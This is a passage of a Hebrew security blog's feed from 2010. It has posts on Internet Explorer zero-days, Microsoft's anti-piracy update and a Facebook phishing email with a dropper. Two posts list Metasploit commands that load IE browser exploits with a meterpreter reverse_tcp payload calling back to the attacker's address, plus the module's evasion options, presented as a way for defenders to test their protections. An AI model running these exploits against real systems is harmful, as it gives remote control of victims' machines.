/&gt;&lt;/a&gt;&lt;/div&gt;שוב -בידקו את מערכות ההגנה שלכם :&lt;br /&gt;
&lt;br /&gt;
Pירצה חדשה בIEXPLORER התגלת ע"י ישראלי בשם משה בן אבו ( כבוד!)&lt;br /&gt;
CVE-2010-0806&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Internet-Explorer-Iepeers-Pointer-Exploit-Metasploit-Demo-video.aspx"&gt;http://www.securitytube.net/Internet-Explorer-Iepeers-Pointer-Exploit-Metasploit-Demo-video.aspx&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Microsoft Security Advisory 981374&lt;br /&gt;
&lt;br /&gt;
Vulnerability in Internet Explorer Could Allow Remote Code Execution&lt;br /&gt;
&lt;br /&gt;
Published: March 09, 2010 &lt;br /&gt;
Updated: March 12, 2010&lt;br /&gt;
&lt;br /&gt;
msf &amp;gt; use exploit/windows/browser/ie_iepeers_pointer&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
msf exploit(ie_iepeers_pointer) &amp;gt; show payloads&lt;br /&gt;
&lt;br /&gt;
msf exploit(ie_iepeers_pointer) &amp;gt; set PAYLOAD windows/meterpreter/reverse_tcp&lt;br /&gt;
&lt;br /&gt;
msf exploit(ie_iepeers_pointer) &amp;gt; set LHOST [MY IP ADDRESS]&lt;br /&gt;
&lt;br /&gt;
msf exploit(ie_iepeers_pointer) &amp;gt; exploit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-7275975083317795427?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/FG-AbDHfhH8VUT-RTniEJLG4KHU/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/FG-AbDHfhH8VUT-RTniEJLG4KHU/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/FG-AbDHfhH8VUT-RTniEJLG4KHU/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/FG-AbDHfhH8VUT-RTniEJLG4KHU/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/7275975083317795427/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2010/03/yet-another-zero-day-for-microsoft.html#comment-form" title="0 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/7275975083317795427?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/7275975083317795427?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2010/03/yet-another-zero-day-for-microsoft.html" title="yet another zero day for microsoft iexplorer-CVE-2010-0806" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_vzNe-NaiwJI/S6xAbWu4fSI/AAAAAAAAAOQ/GI6XL_v7UBc/s72-c/ie-hiba.jpg" height="72" width="72" /><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;CU4GQn88fCp7ImA9WxBbFEo.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-946354941168495299</id><published>2010-03-08T08:21:00.001+02:00</published><updated>2010-03-13T11:52:03.174+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-13T11:52:03.174+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="miscrosoft" /><category scheme="http://www.blogger.com/atom/ns#" term="Administration how to seurity" /><category scheme="http://www.blogger.com/atom/ns#" term="Linux security" /><category scheme="http://www.blogger.com/atom/ns#" term="windows security" /><title>בדיקת virtual patch's -  או כיצד מערכות האבטחה שלנו מתמודדות עם ZERO DAY  </title><content type="html">&lt;div dir="rtl" style="text-align: right;" trbidi="on"&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_vzNe-NaiwJI/S5SV0BV07iI/AAAAAAAAAOI/v3-sI6X_HZo/s1600-h/zeroday_countdown_2.gif" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/_vzNe-NaiwJI/S5SV0BV07iI/AAAAAAAAAOI/v3-sI6X_HZo/s320/zeroday_countdown_2.gif" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
virtual patch's או זיהוי וחסימת התקפה לפני שיחרור הטלאי הרשמי ל ZERODAY הם הגנה מעולה בזמן הפגיע ביותר למחשבים , כלומר הזמן בו המתקיפים יכולים להשתמש בפגיעות וזיכויי ההצלחה הם &amp;nbsp;קרוב ל 100%.&lt;br /&gt;
אך האם הפרסומים שיוצאים איתם חברות אבטחה המידע נכונים?&lt;br /&gt;
ארגונים מעטים מסמלצים התקפות ובודקים את ההגנות לZERODAY ב א מ ת .&lt;br /&gt;
א&lt;b&gt;ני ממליץ לכל אנשי האבטחה להתקין BACKTRACK ולהשתמש ב METASPLOIT או כלים אחרים לביצוע התקפה אמיתית תוך כדי שימוש בקוד הזמין באינטרנט לבדיקת מערכות האבטחה שלהם.&lt;/b&gt;&lt;br /&gt;
אין כאן צורך ב PENTEST מעמיק &amp;nbsp;וזאת צריכה להיות עבודה שהיא חלק מהשוטף .חלק נכבד מההתקפות ניתן לסמלץ בשעה עבודה.&lt;br /&gt;
אני אישית כבר עליתי על &lt;b&gt;אבטחת שווא כזאת מחברה שלא אזכיר את שמה ובעקבות זה שונתה החתימה &lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
לדוגמא &lt;br /&gt;
ה Z0RO DAY האחרון מבית מיקרוסופט &amp;nbsp;המאפשר הרצת קוד על המותקף ע"י פיתויו ללחוץ f1 דרך הודעה הכתובה ב&lt;br /&gt;
VB&lt;br /&gt;
&lt;br /&gt;
&lt;h1&gt;Microsoft Security Advisory 981169&lt;/h1&gt;&lt;h2 class="subtitle"&gt;Vulnerability in VBScript Could Allow Remote Code  Execution&lt;/h2&gt;&lt;div class="date"&gt;Published: March 01, 2010&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
במקום לשבת ולחקות ל PATCH -נבדוק האם קוד הEXPLOIT זמין וננסה לבדוק את חסינות מערכות האבטחה שלנו מולו&lt;br /&gt;
החל מהגנות בגלישה , IPS,MAIL ועד לרמת ה AV המקומי.&lt;br /&gt;
&lt;br /&gt;
הקוד זמין לבדיקה ב METASPLOIT&lt;br /&gt;
לאחר כל ההגדרות והעדכונים נעלה אתר ברשת המבצע את ה EXPLOIT ע"י הרצץ הפקודות הבאות&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;div class="msfconsole"&gt;$  &lt;b&gt;msfconsole&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;###&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;##&lt;br /&gt;
&amp;nbsp;##&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;####&amp;nbsp;######&amp;nbsp;####&amp;nbsp;&amp;nbsp;#####&amp;nbsp;&amp;nbsp;&amp;nbsp;#####&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;####&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;######&lt;br /&gt;
#######&amp;nbsp;##&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;##&amp;nbsp;##&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;&amp;nbsp;###&amp;nbsp;&amp;nbsp;&amp;nbsp;##&lt;br /&gt;
#######&amp;nbsp;######&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;#####&amp;nbsp;&amp;nbsp;&amp;nbsp;####&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;##&lt;br /&gt;
##&amp;nbsp;#&amp;nbsp;##&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;##&amp;nbsp;##&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;#####&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;##&lt;br /&gt;
##&amp;nbsp;&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;####&amp;nbsp;###&amp;nbsp;&amp;nbsp;&amp;nbsp;#####&amp;nbsp;&amp;nbsp;&amp;nbsp;#####&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;##&amp;nbsp;&amp;nbsp;&amp;nbsp;####&amp;nbsp;&amp;nbsp;&amp;nbsp;####&amp;nbsp;&amp;nbsp;&amp;nbsp;####&amp;nbsp;###&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;##&lt;br /&gt;
&lt;br /&gt;
msf  &amp;gt; &lt;b&gt;use exploit/windows/browser/ie_winhlp32&lt;/b&gt;&lt;br /&gt;
msf exploit(ie_winhlp32)  &amp;gt; &lt;b&gt;show payloads&lt;/b&gt;&lt;br /&gt;
msf exploit(ie_winhlp32) &amp;gt; &lt;b&gt;set PAYLOAD  windows/meterpreter/reverse_tcp&lt;/b&gt;&lt;br /&gt;
msf exploit(ie_winhlp32) &amp;gt; &lt;b&gt;set  LHOST [MY IP ADDRESS]&lt;/b&gt;&lt;br /&gt;
msf exploit(ie_winhlp32) &amp;gt;  &lt;b&gt;exploit&lt;/b&gt;&lt;/div&gt;&lt;div class="msfconsole"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;&lt;div class="msfconsole"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;&lt;div class="msfconsole"&gt;&lt;b&gt;אופציות המודול:&lt;/b&gt;&lt;/div&gt;&lt;div class="msfconsole"&gt;&lt;b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;h2&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;table border="1" cellpadding="6" cellspacing="0"&gt;&lt;tbody&gt;
&lt;tr class="rowcola"&gt; &lt;td class="optreq"&gt;SRVHOST&lt;/td&gt; &lt;td&gt;The local host to listen on. (default: 0.0.0.0)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt; &lt;td class="optreq"&gt;SRVPORT&lt;/td&gt; &lt;td&gt;The local port to listen on. (default: 8080)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt; &lt;td class="optopt"&gt;SSL&lt;/td&gt; &lt;td&gt;Negotiate SSL for incoming connections&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt; &lt;td class="optopt"&gt;SSLVersion&lt;/td&gt; &lt;td&gt;Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)  (default: SSL3)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt; &lt;td class="optopt"&gt;URIPATH&lt;/td&gt; &lt;td&gt;The URI to use for this exploit (default is random)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt; &lt;td class="optopt"&gt;ContextInformationFile&lt;/td&gt; &lt;td&gt;The information file that contains context information&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt; &lt;td class="optopt"&gt;DisablePayloadHandler&lt;/td&gt; &lt;td&gt;Disable the handler code for the selected payload&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt; &lt;td class="optopt"&gt;EnableContextEncoding&lt;/td&gt; &lt;td&gt;Use transient context when encoding payloads&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt; &lt;td class="optopt"&gt;WORKSPACE&lt;/td&gt; &lt;td&gt;Specify the workspace for this module&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt; &lt;td class="optopt"&gt;HTML::base64&lt;/td&gt; &lt;td&gt;Enable HTML obfuscation via an embeded base64 html object (accepted: none,  plain, single_pad, double_pad, random_space_injection)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt; &lt;td class="optopt"&gt;HTML::javascript::escape&lt;/td&gt; &lt;td&gt;Enable HTML obfuscation via HTML escaping (number of iterations)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt; &lt;td class="optopt"&gt;HTML::unicode&lt;/td&gt; &lt;td&gt;Enable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be,  utf-16be-marker, utf-32le, utf-32be)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt; &lt;td class="optopt"&gt;HTTP::chunked&lt;/td&gt; &lt;td&gt;Enable chunking of HTTP responses via "Transfer-Encoding: chunked"&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt; &lt;td class="optopt"&gt;HTTP::compression&lt;/td&gt; &lt;td&gt;Enable compression of HTTP responses via content encoding (accepted: none,  gzip, deflate)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt; &lt;td class="optopt"&gt;HTTP::header_folding&lt;/td&gt; &lt;td&gt;Enable folding of HTTP headers&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt; &lt;td class="optopt"&gt;HTTP::junk_headers&lt;/td&gt; &lt;td&gt;Enable insertion of random junk HTTP headers&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt; &lt;td class="optopt"&gt;TCP::max_send_size&lt;/td&gt; &lt;td&gt;Maximum tcp segment size. (0 = disable)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt; &lt;td class="optopt"&gt;TCP::send_delay&lt;/td&gt; &lt;td&gt;Delays inserted before every send. (0 = disable)&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
בהצלחה&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-946354941168495299?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/ETK75TU0vsblWwcSOgdqnpgAmM8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ETK75TU0vsblWwcSOgdqnpgAmM8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/ETK75TU0vsblWwcSOgdqnpgAmM8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ETK75TU0vsblWwcSOgdqnpgAmM8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/946354941168495299/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2010/03/virtual-patchs-zero-day.html#comment-form" title="0 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/946354941168495299?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/946354941168495299?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2010/03/virtual-patchs-zero-day.html" title="בדיקת virtual patch's -  או כיצד מערכות האבטחה שלנו מתמודדות עם ZERO DAY  " /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_vzNe-NaiwJI/S5SV0BV07iI/AAAAAAAAAOI/v3-sI6X_HZo/s72-c/zeroday_countdown_2.gif" height="72" width="72" /><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;Ak8MQHs4fyp7ImA9WxBUGEk.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-7347200620101970227</id><published>2010-03-05T21:07:00.001+02:00</published><updated>2010-03-06T06:14:41.537+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-06T06:14:41.537+02:00</app:edited><title>מה עשרות אלפי משתמשי חלונות ברחבי העולם עשו השבוע?</title><content type="html">&lt;div dir="rtl" style="text-align: right;" trbidi="on"&gt;עשרות אלפי משתמשים בעולם&amp;nbsp; כיוונו את המסך הבא כך:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_vzNe-NaiwJI/S5FJSj0R6bI/AAAAAAAAAOA/Hdu3L8_VEjM/s1600-h/stop+windows+update.JPG" imageanchor="1" style="clear: right; cssfloat: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="278" kt="true" src="http://3.bp.blogspot.com/_vzNe-NaiwJI/S5FJSj0R6bI/AAAAAAAAAOA/Hdu3L8_VEjM/s320/stop+windows+update.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
הסיבה?&lt;br /&gt;
מיקרוסופט שיחררה עדכון דרך מנגנון windows update אשר כל תפקידו הוא למגר את תופעת העותקים הגנובים של מערכת ההפעלה windows 7 .&lt;br /&gt;
&lt;br /&gt;
KB971033 -יורד ומותקן אוטומאטית במחשב ומזהה קרוב ל 70 סוגים שונים של קראקים וסיראלס לא חוקיים.בנוסף,העדכון מכיל מנגנון CALL HOME הפונה למיקרוסופט כל 90 יום ומוריד עדכונים ל WAT (windows activastion technology ) לזיהוי קראקים נוספים שיצוצו .מחשב שזוהה כלא חוקי יקבל מסכים מציקים ושאר הפתעות במיטב המסורת.&lt;br /&gt;
&lt;br /&gt;
עכשיו ,בתור איש אבטחת מידע ,אני בדילמה...&lt;br /&gt;
מצד אחד ברור שפעילות מיקרוסופט היא לגיטימית ונועדה למקסם רווחים ולשמור על זכויות היוצרים (נניח רגע בצד את המחירים השערוריתיים והמונופוליזם הזוועתי).מצד שני ,מעתה ואילך ,אותם עשרות אלפי מערכות לא חוקיות לכאורה או שלא לכאורה (מה&amp;nbsp;עם&amp;nbsp;קורבנות אמיתיים?) לא יזכו לראות עדכוני אבטחה בחייהם!&lt;br /&gt;
ושלא יהיו טעויות - הקראק לפתרון החסימה בדרך, זה רק עניין של זמן עד שכל אותם מחשבים&amp;nbsp;יחזרו למצבם ה"חוקי"&amp;nbsp; אך&amp;nbsp;האם&amp;nbsp;המשתמשים יאשרו מחדש&amp;nbsp;פתיחה&amp;nbsp; של&amp;nbsp;העדכונים האוטומטיים? זה&amp;nbsp;לא יקרה&amp;nbsp;.המחשבים האלו דינם להידבק ולהדביק&amp;nbsp; ובסופו של דבר גם מחזיקי העותקים החוקיים יפגעו בתהליך.&lt;br /&gt;
&lt;br /&gt;
מננגנון העדכונים של מקרוסופט הופך שוב את עורו ממשהו בעל חשיבות למשהו שנוא שעדיף להשתיקו.&lt;br /&gt;
&lt;br /&gt;
כל זה מוביל אותי לשתי מסקנות:&lt;br /&gt;
&lt;br /&gt;
1. הבעיה היא כמו תמיד ביישום ולא במנגנון ההצפנה :) כלומר ,מיקרוסופט יכולה למצא דרך תקשורת חלופית לזיהוי עותקים לא חוקיים&amp;nbsp;ללא שימוש במנגנון&amp;nbsp;העדכונים&amp;nbsp;ובכך גם לטפל בסוררים וגם לשמור&amp;nbsp;על&amp;nbsp;מערכת הפעלה מעודכנת ומאובטחת.&lt;br /&gt;
2. עוד עבודה בשבילי!&lt;br /&gt;
&lt;br /&gt;
שבת שלום.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-7347200620101970227?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/T8Qf134KtQ025xOpDOtvFBE1_Bk/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/T8Qf134KtQ025xOpDOtvFBE1_Bk/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/T8Qf134KtQ025xOpDOtvFBE1_Bk/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/T8Qf134KtQ025xOpDOtvFBE1_Bk/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/7347200620101970227/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2010/03/blog-post.html#comment-form" title="0 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/7347200620101970227?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/7347200620101970227?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2010/03/blog-post.html" title="מה עשרות אלפי משתמשי חלונות ברחבי העולם עשו השבוע?" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_vzNe-NaiwJI/S5FJSj0R6bI/AAAAAAAAAOA/Hdu3L8_VEjM/s72-c/stop+windows+update.JPG" height="72" width="72" /><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;DUQEQXg-fyp7ImA9WxBUFEo.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-8719107558938259853</id><published>2010-03-01T22:52:00.002+02:00</published><updated>2010-03-01T23:01:40.657+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-01T23:01:40.657+02:00</app:edited><title>מתקפת PHISHING במסגרת אהבתנו ל FACEBOOK</title><content type="html">&lt;div dir="rtl" style="text-align: right;" trbidi="on"&gt;עשרות מיילים נשלחו לארגון בו אני עובד בזו הלשון:&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_vzNe-NaiwJI/S4worShL8kI/AAAAAAAAANw/tVa9hv8IUeI/s1600-h/facebookphishing.png" imageanchor="1" style="clear: right; cssfloat: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="123" kt="true" src="http://3.bp.blogspot.com/_vzNe-NaiwJI/S4worShL8kI/AAAAAAAAANw/tVa9hv8IUeI/s400/facebookphishing.png" width="400" /&gt;&lt;/a&gt;&lt;a href="http://3.bp.blogspot.com/_vzNe-NaiwJI/S4wlUd_XnuI/AAAAAAAAANg/VEJhoSP8VkU/s1600-h/facebookPhishing.png" imageanchor="1" style="clear: right; cssfloat: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;במבט מהיר על סגנון הטקסט ניתן לקבוע כי אנגלית איננה שפת האם של השולחים:)&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div align="right" class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_vzNe-NaiwJI/S4wqlLYifdI/AAAAAAAAAN4/EL005wtdp70/s1600-h/facebookphishing5.png" imageanchor="1" style="clear: right; cssfloat: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="217" kt="true" src="http://1.bp.blogspot.com/_vzNe-NaiwJI/S4wqlLYifdI/AAAAAAAAAN4/EL005wtdp70/s320/facebookphishing5.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: right;"&gt;בבדיקת הקובץ התקבלו התוצאות:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_vzNe-NaiwJI/S4wmFBcGglI/AAAAAAAAANo/4PMyDlL7fCU/s1600-h/facebookPhishing2.png" imageanchor="1" style="clear: right; cssfloat: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="400" kt="true" src="http://1.bp.blogspot.com/_vzNe-NaiwJI/S4wmFBcGglI/AAAAAAAAANo/4PMyDlL7fCU/s400/facebookPhishing2.png" width="355" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div align="right" class="separator" style="clear: both; text-align: center;"&gt;הקובץ מזוהה ע"י רוב חברות הAV כDROPPER&amp;nbsp;- החלק הראשון של הטרויאני כלומר הקובץ ה"מכין את השטח" וממתין לביצוע הורדה של חלקים נוספים של הוירוס למטרון שונות&lt;/div&gt;&lt;div align="right" class="separator" style="clear: both; text-align: center;"&gt;ראו הוזהרתם&lt;/div&gt;&lt;div align="right" class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-8719107558938259853?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/3Hr64jFDWZ4slsyHZxFE1n-yW5s/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/3Hr64jFDWZ4slsyHZxFE1n-yW5s/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
